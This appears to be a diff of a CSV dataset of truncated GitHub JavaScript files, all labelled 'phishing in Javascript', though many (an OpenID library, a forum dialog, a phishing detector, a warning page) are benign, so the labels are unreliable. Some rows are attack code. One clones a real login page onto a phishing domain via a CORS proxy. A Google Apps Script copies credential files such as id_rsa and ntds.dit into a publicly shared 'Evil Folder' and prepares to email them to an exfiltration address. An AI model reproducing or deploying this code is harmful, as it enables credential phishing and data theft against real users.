+ * copies of the Software, and to permit persons to whom the Software is
532
+ * furnished to do so, subject to the following conditions:
533
+ *
534
+ * The above copyright notice and this permission notice shall be included in
535
+ * all copies or substantial portions of the Software.
536
+ *
537
+ * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
538
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
539
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
540
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
541
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
542
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
543
+ *
544
+ * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*-
545
+ * vim: set sw=2 ts=2 et tw=80 :
546
+ */
547
+
548
+ const { access } = require('fs');
549
+
550
+ var Buffer = require('buffer').Buffer,
551
+ crypto = require('crypto'),
552
+ http = require('./http'),
553
+ querystring = require('querystring'),
554
+ url = require('url'),
555
+ xrds = require('./lib/xrds');
556
+
557
+ var _associations = {};
558
+ var _discoveries = {};
559
+ var _nonces = {};
560
+
561
+ var AX_MAX_VALUES_COUNT = 1000;
562
+
563
+ var openid = exports;
564
+
565
+ var _get = http.get;
566
+ var _post = http.post;
567
+
568
+ function hasOwnProperty(obj, prop) {
569
+ return Object.prototype.hasOwnProperty.call(obj, prop);
570
+ }
571
+
572
+ openid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {
573
+ this.returnUrl = returnUrl;
574
+ this.realm = realm || null;
575
+ this.stateless = stateless;
576
+ this.str",Javascript,havard/node-openid,2025-05-22T22:01:01.483356,training
577
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//If container already in DOM, remove it
578
+ if(report.length > 0) report.remove();
579
+
580
+ //Container report
581
+ /*report = $('<div id=""report"">\
582
+ <textarea id=""reportv"" maxlength=""150"" placeholder=""Attention, les signalements abusifs, sans intérêt ou encore pour dire merci seront passible de sanction allant d\'un simple avertissement au ban.""></textarea>\
583
+ </div>');*/
584
+
585
+
586
+ body.append('<div id=report> </div>');
587
+
588
+ report = cacheSel('#report');
589
+
590
+ //Container, select subject / textarea
591
+ report.html('<p>Selectionner le sujet de votre signalement</p>\
592
+ <ul>\
593
+ <li id=reDead><i class=""fa fa-unlink""> Liens morts</i></li>\
594
+ <li id=reForb><i class=""fa fa-ban""> Hors charte</i></li>\
595
+ <li id=reMove><i class=""fa fa-share""> A déplacer</i></li>\
596
+ <li id=reSecu><i class=""fa fa-crosshairs""> Virus/Trojan/Scam...</i></li>\
597
+ <li id=reHate><i class=""fa fa-globe""> Insulte envers un peuple/religion/minorité...</i></li>\
598
+ <li id=rePers><i class=""fa fa-eye-slash""> Violation vie privée</i></li>\
599
+ <li id=reProt><i class=""fa fa-child""> Contenu pédophile</i></li>\
600
+ <li id=reOthr><i class=""fa fa-random""> Réouverture, résolu, autres...</i></li>\
601
+ </ul>\
602
+ <textarea id=reportv placeholder=""default""></textarea>');
603
+
604
+ //Refresh caching
605
+ report = cacheSel('#report');
606
+ reportv = cacheSel('#reportv');
607
+
608
+ //Hide the reportv until a subject get select
609
+ reportv.hide();
610
+
611
+ //Get 80% in px
612
+ var sizecal = $(window).width() * 0.8;
613
+
614
+ //Max width
615
+ if(parseInt(sizecal) > 600) var sizecal = 600;
616
+
617
+ //Pop the container vote
618
+ report.dialog({
619
+ width:sizecal,
620
+ modal:true,
621
+ resizable: true,
622
+ title:'Signalement',
623
+ dialogClass:'modalNinja',
624
+ show:{effect:'scale', duration: 320},
625
+ buttons: [{
626
+ text: 'Confirmation',
627
+ click: function() {
628
+
629
+ //Subject
630
+ reps = reportv.attr('class');
631
+
632
+ //Value textarea
633
+ rept = reportv.val();
634
+
635
+ //Less 10 chars return
636
+ if(rept.length < 10) {
637
+ coloredInput(reportv,'errorSe','Minimum 10 caractères');
638
+ return;
639
+ ",Javascript,Anyon3/ninjacms,2025-05-22T22:01:01.680023,training
640
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/**
641
+ * Created by IntelliJ IDEA.
642
+ * User: Altryne
643
+ * Date: Nov 20, 2010
644
+ * Time: 4:55:41 AM
645
+ * To change this template use File | Settings | File Templates.
646
+ */
647
+
648
+ var intervall = 0;
649
+ can_run_apps = false,
650
+ folder_open = false,
651
+ tick = '',
652
+ doubleclickthreshhold = 200,
653
+ isDblClick = false,
654
+ canScroll = true,
655
+ active_app = '';
656
+
657
+ $('.page .delete,#dock .delete').live('click', function(event) {
658
+ event.stopPropagation();
659
+ event.stopImmediatePropagation();
660
+ if(confirm('Are you sure you want to delete this app from you iPad?')){
661
+ $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
662
+ $(this).siblings('.app_logo')
663
+ .stop()
664
+ .css('position','absolute')
665
+ .animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){$(this).parent().remove()})
666
+ }
667
+ });
668
+ $('#multitask_bar .delete').live('mousedown ', function(event) {
669
+ event.stopPropagation();
670
+ event.stopImmediatePropagation();
671
+ $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();
672
+ $(this).siblings('.app_logo')
673
+ .stop()
674
+ .css('position','absolute')
675
+ .animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){
676
+ _id = $(this).parent().attr('id');
677
+ $('#'+_id+'_app').remove();
678
+ $(this).parent().remove();
679
+ if(!$('#multitask_bar li').length){
680
+ closeMultitask(200);
681
+ }
682
+ })
683
+ });
684
+
685
+ $('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {
686
+ if (event.type == 'mousedown') {
687
+ $(this).addClass('mousedown');
688
+ if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {
689
+ can_run_apps = true;
690
+ intervall = setTimeout(edit_mode, '1000');
691
+ }else if($(this).hasClass('folder') && $('body').is('.editMode')){
692
+ openFolder($(this).attr('id",Javascript,altryne/Ipad-Simulator,2025-05-22T22:01:01.825080,training
693
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/*
694
+ * Copyright (c) 2021, Atheropids. All rights reserved.
695
+ *
696
+ * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
697
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
698
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
699
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
700
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
701
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
702
+ * SOFTWARE.
703
+ */
704
+
705
+ 'use strict';
706
+
707
+ const https = require('https');
708
+ const readline = require('readline');
709
+ const tough = require('tough-cookie');
710
+
711
+ // Spec holder class. Please see comments of member variables for details.
712
+ class PhishingServer {
713
+ constructor(__domain, __entry_path = '/', __login_page = '/home/login', __login_inbox = '/login/dologin') {
714
+
715
+ // Target C&C server domain name.
716
+ this.target_domain = __domain;
717
+
718
+ // Remote path for server cookie init.
719
+ this.entry_path = __entry_path;
720
+
721
+ // Remote path of the phishing page.
722
+ this.phishing_page_path = __login_page;
723
+
724
+ // Remote path of the phishing data receiver.
725
+ this.phishing_target_path = __login_inbox;
726
+ }
727
+ }
728
+
729
+ /*
730
+ * Settings are here c:
731
+ * Modify them on your purpose.
732
+ */
733
+
734
+ // List of malicious servers.
735
+ let spam_targets = [
736
+ // [seized operation] new PhishingServer('steamcomrninuty.ru'),
737
+ // [seized operation] new PhishingServer('steamcommnunmity.com', '/id/zxayonax'),
738
+ // [seized operation] new PhishingServer('nitro-discord.ru', '/airdrop'),
739
+ // [seized operation] new PhishingServer('steamcommunity.link'),
740
+ // [seized operation] new PhishingServer('discorcl.link'),
741
+ new PhishingServer('steamcommmunilty.com', '/tradoffer/new/?partner=406482431&token=lfk938iK'),
742
+ new PhishingServer('discorrd.ru'),
743
+ new PhishingServer('free-nitroos.ru'),
744
+ new PhishingServer('discod.info', '/nitro-gift'),
745
+ new PhishingServer('d",Javascript,Atheropids/SteamComrninuty-Phish-Spammer,2025-05-22T22:01:02.005822,training
746
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"module.exports = [
747
+ '2015',
748
+ '2016',
749
+ '2017',
750
+ '2018',
751
+ '2019',
752
+ '2020',
753
+ 'abuse',
754
+ 'academy',
755
+ 'accessibility',
756
+ 'account',
757
+ 'accountant',
758
+ 'accounting',
759
+ 'accountmanager',
760
+ 'accountmanagers',
761
+ 'accounts',
762
+ 'accountspayable',
763
+ 'acquisition',
764
+ 'admin',
765
+ 'admin1',
766
+ 'administracao',
767
+ 'administracion',
768
+ 'administrador',
769
+ 'administratie',
770
+ 'administratif',
771
+ 'administration',
772
+ 'administrativo',
773
+ 'administrator',
774
+ 'administrators',
775
+ 'admins',
776
+ 'adminteam',
777
+ 'admissions',
778
+ 'adops',
779
+ 'ads',
780
+ 'adventure',
781
+ 'advertise',
782
+ 'advertising',
783
+ 'advertisingsales',
784
+ 'advice',
785
+ 'advisor',
786
+ 'advisors',
787
+ 'adwords',
788
+ 'affiliate',
789
+ 'affiliates',
790
+ 'agence',
791
+ 'agencia',
792
+ 'agency',
793
+ 'agents',
794
+ 'alarm',
795
+ 'alarms',
796
+ 'alert',
797
+ 'alerts',
798
+ 'alexa',
799
+ 'all',
800
+ 'all-employees',
801
+ 'all-pms',
802
+ 'all-staff',
803
+ 'all-team',
804
+ 'all-users',
805
+ 'all.employees',
806
+ 'all.staff',
807
+ 'all.users',
808
+ 'all_staff',
809
+ 'alla',
810
+ 'alle',
811
+ 'allemployees',
812
+ 'allhands',
813
+ 'allsales',
814
+ 'allstaff',
815
+ 'allstudents',
816
+ 'allteachers',
817
+ 'allteam',
818
+ 'allusers',
819
+ 'alpha',
820
+ 'alphas',
821
+ 'alumni',
822
+ 'ambassadors',
823
+ 'amministrazione',
824
+ 'analysts',
825
+ 'analytics',
826
+ 'android',
827
+ 'angels',
828
+ 'animation',
829
+ 'announce',
830
+ 'announcements',
831
+ 'ap',
832
+ 'api',
833
+ 'app',
834
+ 'apple',
835
+ 'application',
836
+ 'applications',
837
+ 'apply',
838
+ 'appointments',
839
+ 'apps',
840
+ 'archives',
841
+ 'asistente',
842
+ 'asset',
843
+ 'assistanthead',
844
+ 'assistencia',
845
+ 'assistenza',
846
+ 'associates',
847
+ 'associates-all',
848
+ 'ateam',
849
+ 'atencionalcliente',
850
+ 'atendimento',
851
+ 'auctions',
852
+ 'available',
853
+ 'backend',
854
+ 'backend-dev',
855
+ 'backup',
856
+ 'bd',
857
+ 'benefits',
858
+ 'berlin',
859
+ 'bestellung',
860
+ 'beta',
861
+ 'biblioteca',
862
+ 'bibliotheque',
863
+ 'billing',
864
+ 'bills',
865
+ 'biuro',
866
+ 'biz',
867
+ 'bizdev',
868
+ 'blog',
869
+ 'board',
870
+ 'bod',
871
+ 'bookclub',
872
+ 'booking',
873
+ 'bookings',
874
+ 'boston',
875
+ 'boxoffice',
876
+ 'brand',
877
+ 'branding',
878
+ 'brands',
879
+ 'brandsolutions',
880
+ 'broadcast',
881
+ 'buchhaltung',
882
+ 'bugs',
883
+ 'build',
884
+ 'bursar',
885
+ 'busdev',
886
+ 'business',",Javascript,decal/werdlists,2025-05-22T22:01:02.114023,training
887
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"page_src = ""https://login.vulnwebsite.com/"";
888
+ phishing_url=""http://yourphishingdomain.com/"";
889
+
890
+ function doHTMLMagic(pageSource, baseURL, phishDomain) {
891
+ replaceSrc = pageSource.replace('href=""/', ""href=\"""" + baseURL+ '/');
892
+ replaceSrc = replaceSrc.replace('src=""/', ""src=\"""" + baseURL+ '/');
893
+ replaceSrc = replaceSrc.replace('<head>', '<head><base href=""' + phishDomain + '"">');
894
+ return replaceSrc;
895
+ }
896
+
897
+ function createCORSRequest(method, url) {
898
+ var xhr = new XMLHttpRequest();
899
+ if (""withCredentials"" in xhr) {
900
+ xhr.open(method, url, true);
901
+ } else if (typeof XDomainRequest != ""undefined"") {
902
+ xhr = new XDomainRequest();
903
+ xhr.open(method, url);
904
+ } else {
905
+ xhr = null;
906
+ }
907
+ return xhr;
908
+ }
909
+
910
+ function makeCorsRequest(baseURL, phishDomain) {
911
+ var url = 'https://cors-anywhere.herokuapp.com/' + baseURL;
912
+
913
+ var xhr = createCORSRequest('GET', url);
914
+ if (!xhr) {
915
+ return;
916
+ }
917
+
918
+ xhr.onload = function() {
919
+ var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)
920
+ document.open();
921
+ document.write(pageSourceStr);
922
+ document.close();
923
+ };
924
+
925
+ xhr.send();
926
+ }
927
+
928
+ makeCorsRequest(page_src, phishing_url);
929
+ window.history.pushState("""", ""Login"", ""/login"");",Javascript,infosec-au/phishJS,2025-05-22T22:01:02.254176,training
930
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const { Builder, By, until, Capabilities } = require(""selenium-webdriver"")
931
+ const chrome = require(""selenium-webdriver/chrome"")
932
+ const url = require(""url"")
933
+ const fs = require(""fs"")
934
+ const crypto = require(""crypto"")
935
+ const request = require(""request"")
936
+ const path = require(""path"")
937
+ const FormData = require(""form-data"")
938
+ const proxy = require(""selenium-webdriver/proxy"")
939
+ const proxyChain = require(""proxy-chain"")
940
+ require('console-stamp')(console, {
941
+ format: ':date(yyyy/mm/dd HH:MM:ss.l)'
942
+ })
943
+ require(""dotenv"").config()
944
+
945
+ const extensionId = ""caacbgbklghmpodbdafajbgdnegacfmo""
946
+ const CRX_URL = `https://clients2.google.com/service/update2/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`
947
+ const USER_AGENT =
948
+ ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36""
949
+
950
+ const USER = process.env.APP_USER || """"
951
+ const PASSWORD = process.env.APP_PASS || """"
952
+ const ALLOW_DEBUG = !!process.env.DEBUG?.length || false
953
+ const EXTENSION_FILENAME = ""app.crx""
954
+ const PROXY = process.env.PROXY || undefined
955
+
956
+ console.log(""-> Starting..."")
957
+ console.log(""-> User:"", USER)
958
+ console.log(""-> Pass:"", PASSWORD)
959
+ console.log(""-> Proxy:"", PROXY)
960
+ console.log(""-> Debug:"", ALLOW_DEBUG)
961
+
962
+ if (!USER || !PASSWORD) {
963
+ console.error(""Please set APP_USER and APP_PASS env variables"")
964
+ process.exit()
965
+ }
966
+
967
+ if (ALLOW_DEBUG) {
968
+ console.log(
969
+ ""-> Debugging is enabled! This will generate a screenshot and console logs on error!""
970
+ )
971
+ }
972
+
973
+ async function downloadExtension(extensionId) {
974
+ const url = CRX_URL.replace(extensionId, extensionId)
975
+ const headers = { ""User-Agent"": USER_AGENT }
976
+
977
+ console.log(""-> Downloading extension from:"", url)
978
+
979
+ // if file exists and modify time is less than 1 day, skip download
980
+ if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {
981
+ console.log(""-> Extension already downloaded! skip download..."")
982
+ return
983
+ }
984
+
985
+ return new ",Javascript,web3bothub/gradient-bot,2025-05-22T22:01:02.390815,training
986
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const SCALES = { URGENCY: 5, CONFRIM: 6 };
987
+ const TOTALSCALE = 20;
988
+ const THRESH = 0.33;
989
+
990
+ function emailCheck(email) {
991
+ let scale = 0;
992
+ let idx = email.lastIndexOf(""@"");
993
+ id = email.slice(0, idx);
994
+ dmn = email.slice(idx + 1);
995
+ len1 = id.length;
996
+ len2 = dmn.length;
997
+ // Check Email ID for Number Count >= 3
998
+ idNums = id.replace(/\D/g, """");
999
+ if (idNums && idNums.length >= 3) scale += 2;
1000
+ // Check Email Domain for Number Count > 0
1001
+ dmnNums = dmn.replace(/\D/g, """");
1002
+ if (dmnNums && dmnNums.length > 0) scale += 2;
1003
+ // Check Email Domain for Common Domain
1004
+ let found = DOMAINS.find(d => d === dmn);
1005
+ if (!found) scale += 1;
1006
+ return scale;
1007
+ }
1008
+
1009
+ function URLcheck(body) {
1010
+ url = body.match(
1011
+ /[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/
1012
+ );
1013
+ if (url) return 2;
1014
+ return 0;
1015
+ }
1016
+
1017
+ function greetingCheck(greeting) {
1018
+ let scale = 0;
1019
+ for (i = 0; i < 3; i++) {
1020
+ let found = GREETINGS.find(greet => greeting[i] === greet);
1021
+ if (found) scale += 1;
1022
+ if (scale > 1) return 2;
1023
+ }
1024
+ return scale;
1025
+ }
1026
+
1027
+ function urgencyCheck(word) {
1028
+ let found = URGENCY_WORDS.find(w => w === word);
1029
+ if (found) return 5 / 3;
1030
+ return 0;
1031
+ }
1032
+
1033
+ function confirmCheck(word) {
1034
+ let found = CONFIRMING_WORDS.find(w => w === word);
1035
+ if (found) return 2;
1036
+ return 0;
1037
+ }
1038
+
1039
+ function dictionaryCheck(body) {
1040
+ body = body
1041
+ .replace(/[.,'\/#!$%\^&\*;:{}=\-_`~()]/g, """")
1042
+ .replace(/\r?\n|\r/g, "" ""); // Remove special chars
1043
+ let words = body.split("" "");
1044
+ words = words.filter(w => Boolean(w)); //Remove falsey values
1045
+ let greeting = words.splice(0, 3);
1046
+ let grtScale = greetingCheck(greeting);
1047
+ let urgScale = 0;
1048
+ let cfmScale = 0;
1049
+ words.forEach(word => {
1050
+ if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);
1051
+ if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word);
1052
+ });
1053
+ return { grtScale, urgScale, cfmScale };
1054
+ }
1055
+
1056
+ function phishCheck(email, body) {
1057
+ let eScale = emailCheck(email);
1058
+ let urlScale = URLcheck(body);
1059
+ let dictScale = dic",Javascript,PhishersOfMen/Assn5-Phishing-SQLI,2025-05-22T22:01:02.523095,training
1060
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"#!/usr/bin/env node
1061
+ const fs = require('fs');
1062
+ const debug = require('debug')('fuzz:main');
1063
+ const Promise = require('bluebird');
1064
+ const program = require('commander');
1065
+ const request = require('request');
1066
+ const libssdeep = require('ssdeep');
1067
+ const csv = require('csv');
1068
+ const ProgressBar = require('progress');
1069
+ const CONF = require('./config');
1070
+ const { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('./lib/utils');
1071
+ const { DomainFuzz, DomainDict, DomainThread } = require('./lib');
1072
+
1073
+ const fuzz = (opts, domains, worker) => {
1074
+ const total = domains.length;
1075
+ const bar = new ProgressBar('Running [:bar] :percent :etas', {
1076
+ complete: '=',
1077
+ incomplete: ' ',
1078
+ width: 50,
1079
+ total,
1080
+ });
1081
+ Promise
1082
+ .map(domains, (domain) => {
1083
+ bar.tick(1);
1084
+ return worker.run(domain);
1085
+ }, { concurrency: opts.concurrency })
1086
+ .then((result) => {
1087
+ if (opts.option_output) {
1088
+ let data;
1089
+ if (opts.option_format === 'JSON') {
1090
+ data = JSON.stringify(result, null, 4);
1091
+ fs.appendFile(opts.option_output, data, 'utf8', (err) => {
1092
+ if (err) printError(err.message);
1093
+ });
1094
+ } else if (opts.option_format === 'CSV') {
1095
+ data = [];
1096
+ const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';
1097
+ data.push(columns.split(','));
1098
+ for (const domain of result) {
1099
+ data.push(columns.split(',').map(_ => domain[_]));
1100
+ }
1101
+ csv.stringify(data, (parseErr, res) => {
1102
+ fs.appendFile(this.option_output, res, 'utf8', (err) => {
1103
+ if (err) printError(err.message);
1104
+ });
1105
+ });
1106
+ }
1107
+ }
1108
+ for (const domain of result) {
1109
+ printResult(domain);
1110
+ }
1111
+ })
1112
+ .catch(err => printError(err.message));
1113
+ };
1114
+
1115
+ const main = () => {
1116
+ const opts = program
1117
+ .version(CONF.version)
1118
+ .usage('[options] DOMAIN')
1119
+ .description(`Find similar-loo",Javascript,monkeym4ster/DomainFuzz,2025-05-22T22:01:02.651975,training
1120
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require(""fs"");
1121
+
1122
+ // load puppeteer
1123
+ const puppeteer = require('puppeteer');
1124
+
1125
+ const window_height = 768;
1126
+ const window_width = 1366;
1127
+ const studio_url = ""https://studio.youtube.com/"";
1128
+
1129
+ // directory contains the videos you want to upload
1130
+ const upload_file_directory = ""your video directory"";
1131
+ // change user data directory to your directory
1132
+ const chrome_user_data_directory = ""C:\\Users\\user\\AppData\\Local\\Chromium\\User Data"";
1133
+
1134
+ const title_prefix = ""video title prefix "";
1135
+ const video_description = """";
1136
+
1137
+ const DEFAULT_ARGS = [
1138
+ '--disable-background-networking',
1139
+ '--enable-features=NetworkService,NetworkServiceInProcess',
1140
+ '--disable-background-timer-throttling',
1141
+ '--disable-backgrounding-occluded-windows',
1142
+ '--disable-breakpad',
1143
+ '--disable-client-side-phishing-detection',
1144
+ '--disable-component-extensions-with-background-pages',
1145
+ '--disable-default-apps',
1146
+ '--disable-dev-shm-usage',
1147
+ '--disable-extensions',
1148
+ // BlinkGenPropertyTrees disabled due to crbug.com/937609
1149
+ '--disable-features=TranslateUI,BlinkGenPropertyTrees',
1150
+ '--disable-hang-monitor',
1151
+ '--disable-ipc-flooding-protection',
1152
+ '--disable-popup-blocking',
1153
+ '--disable-prompt-on-repost',
1154
+ '--disable-renderer-backgrounding',
1155
+ '--disable-sync',
1156
+ '--force-color-profile=srgb',
1157
+ '--metrics-recording-only',
1158
+ '--no-first-run',
1159
+ '--enable-automation',
1160
+ '--password-store=basic',
1161
+ '--use-mock-keychain',
1162
+ ];
1163
+
1164
+ let files = [];
1165
+ fs.readdir(upload_file_directory, function (err, temp_files) {
1166
+ if (err) {
1167
+ console.log('Something went wrong...');
1168
+ return console.error(err);
1169
+ }
1170
+ for (let i = 0; i < temp_files.length; i++) {
1171
+ files.push(temp_files[i]);
1172
+ }
1173
+ });
1174
+
1175
+ try {
1176
+ (async () => {
1177
+ const browser = await puppeteer.launch(
1178
+ {
1179
+ 'headless': false, // have window
1180
+ executablePath: null,
1181
+ userDataDir: chrome_user_data_directory,
1182
+ ignoreDefaultArgs: ",Javascript,last2win/youtube-upload-multi-videos,2025-05-22T22:01:02.782934,training
1183
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import warning from './station.svg'
1184
+ import terra from './terra.svg'
1185
+ import './fonts.css'
1186
+ import './App.css'
1187
+
1188
+ const SAFE_PAGE = 'https://station.money'
1189
+
1190
+ function App() {
1191
+ if (!document.referrer || document.referrer === window.location.href) {
1192
+ //window.location.href = SAFE_PAGE
1193
+ }
1194
+
1195
+ if (document.referrer) {
1196
+ const { hostname } = new URL(document.referrer)
1197
+ if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {
1198
+ return (
1199
+ <div className='app__terra'>
1200
+ <img src={terra} alt='Terra logo' />
1201
+ <h2>WARNING</h2>
1202
+ <p>
1203
+ <span className='url'>{hostname}</span> is currently
1204
+ unavailable. <br /> Please visit{' '}
1205
+ <span className='url'>
1206
+ <a href='https://twitter.com/terra_money'>
1207
+ twitter.com/terra_money
1208
+ </a>
1209
+ </span>{' '}
1210
+ for updates.
1211
+ </p>
1212
+ </div>
1213
+ )
1214
+ }
1215
+ }
1216
+
1217
+ return (
1218
+ <div className='App'>
1219
+ <img src={warning} alt='warning' />
1220
+ <h2>PHISHING ALERT</h2>
1221
+ <p>
1222
+ You are trying to visit <span className='url'>{document.referrer}</span>
1223
+ <br />
1224
+ which is a known scam website.
1225
+ </p>
1226
+ <span
1227
+ onClick={() => {
1228
+ window.location.href = SAFE_PAGE
1229
+ }}
1230
+ className='button__main'
1231
+ >
1232
+ Go back to safety
1233
+ </span>
1234
+ {/*
1235
+ <a
1236
+ href={document.referrer}
1237
+ >
1238
+ Visit anyway
1239
+ </a>
1240
+ */}
1241
+ </div>
1242
+ )
1243
+ }
1244
+
1245
+ export default App
1246
+ ",Javascript,terra-money/scam-alert-web,2025-05-22T22:01:02.912967,training
1247
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const fs = require('fs')
1248
+ const fsExtra = require('fs-extra')
1249
+ const rmRf = require('rimraf')
1250
+
1251
+ const Streams = require('mississippi')
1252
+ const bind = require('ap').partial
1253
+ const async = require('./async')
1254
+
1255
+ const Browserify = require('browserify')
1256
+ const watchify = require('watchify')
1257
+ const sassStream = require('sass-css-stream')
1258
+
1259
+
1260
+
1261
+
1262
+ start(function(err){
1263
+ if (err) throw err
1264
+ console.log('end')
1265
+ })
1266
+
1267
+
1268
+ function start(cb){
1269
+ async.series({
1270
+ clean,
1271
+ build,
1272
+ }, cb)
1273
+ }
1274
+
1275
+ function clean(cb){
1276
+ fsExtra.remove('./dist/', cb)
1277
+ }
1278
+
1279
+ function build(cb){
1280
+ async.parallel({
1281
+ buildJs,
1282
+ buildCss,
1283
+ buildStatic,
1284
+ }, cb)
1285
+ }
1286
+
1287
+ function buildJs(cb) {
1288
+ var browserify = Browserify({
1289
+ entries: ['./src/js/index.js'],
1290
+ cache: {},
1291
+ packageCache: {},
1292
+ // plugin: [watchify],
1293
+ })
1294
+
1295
+ browserify.on('update', bundle)
1296
+
1297
+ async.series({
1298
+ buildJsPrep: bind(fsExtra.mkdirs, './dist/js'),
1299
+ buildJsStart: start,
1300
+ }, cb)
1301
+
1302
+ function start(cb){
1303
+ var firstBundle = bundle()
1304
+ Streams.finished(firstBundle, cb)
1305
+ }
1306
+
1307
+ function bundle() {
1308
+ console.log('bundle')
1309
+ return Streams.pipeline(
1310
+ browserify.bundle(),
1311
+ fs.createWriteStream('./dist/js/bundle.js')
1312
+ )
1313
+ }
1314
+ }
1315
+
1316
+ function buildCss(cb) {
1317
+
1318
+ async.series({
1319
+ buildCssPrep: bind(fsExtra.mkdirs, './dist/css'),
1320
+ buildCssStart: start,
1321
+ }, cb)
1322
+
1323
+ function start(cb) {
1324
+ var pipeline = Streams.pipeline(
1325
+ fs.createReadStream( './src/css/index.scss' ),
1326
+ sassStream( './src/css/index.scss' ),
1327
+ fs.createWriteStream( './dist/css/bundle.css' )
1328
+ )
1329
+ Streams.finished(pipeline, cb)
1330
+ }
1331
+ }
1332
+
1333
+ function buildStatic(cb) {
1334
+
1335
+ async.parallel({
1336
+ imgs: bind(fsExtra.copy, './src/img/', './dist/img/'),
1337
+ faviconAndroid: bind(fsExtra.copy, './src/manifest.json', './dist/manifest.json'),
1338
+ faviconIE: bind(fsExtra.copy, './src/browserconfig.xml', './dist/browserconfig.xml'),
1339
+ fonts: bind(fsExtra.copy, './src/fonts/', './dist/fonts/'),
1340
+ index: bind(fsExtra.copy, './src/index.html'",Javascript,409H/landing,2025-05-22T22:01:03.059650,training
1341
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Created by Greg Carson @ Feb 2017
1342
+ // ---------------------------------------
1343
+ // Play nice and use for security training
1344
+ // and testing.
1345
+
1346
+ function drivePassSearch() {
1347
+
1348
+ // This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.
1349
+ // This can be disabled for Google Apps for Business users:
1350
+ // https://support.google.com/a/answer/60781?hl=en
1351
+ // Personal users shit out of luck? Not sure haven't looked into it.
1352
+
1353
+ var folder = DriveApp.createFolder('Evil Folder');
1354
+ folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);
1355
+
1356
+ // Construct malicious search query on drive. Look for PDFs? DOC/XLS files? If you are looking for an extension use 'title contains'
1357
+ // If you want to search through content for a keyword use 'fullText contains' instead
1358
+ // You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image/' or mimeType contains 'video/')'
1359
+ // Not aware of case sensitivity or ability to perform regular expressions
1360
+ // Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit
1361
+ // or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera
1362
+
1363
+ var files = DriveApp.searchFiles(
1364
+ 'modifiedDate > ""2013-02-28"" and title contains ""SEARCHTERMHERE""');
1365
+ while (files.hasNext()) {
1366
+ var file = files.next();
1367
+ Logger.log(file.getDownloadUrl());
1368
+ Logger.log(file.getUrl());
1369
+ Logger.log(file.getName());
1370
+ var name = file.getName();
1371
+ file.makeCopy(name,folder);
1372
+ Logger.log(file.getDownloadUrl());
1373
+ Logger.log(file.getUrl());
1374
+
1375
+ }
1376
+
1377
+ // Write Logger data to body of email and send to specified recipient
1378
+ // Sender address is the current active user
1379
+
1380
+ Logger.log(folder.getUrl());
1381
+ var recipient = ""RECPIENT-EXFIL-EMAIL-ADDRESS-HERE"";
1382
+ var subject = 'Google Drive Query - KDBX';
1383
+ var body = Logger.getLog();
1384
